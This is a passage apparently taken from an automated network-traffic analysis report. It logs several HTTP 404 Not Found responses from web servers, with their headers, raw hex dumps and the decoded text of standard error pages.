2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 07 Nov 2024 16:58:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:58:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:58:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 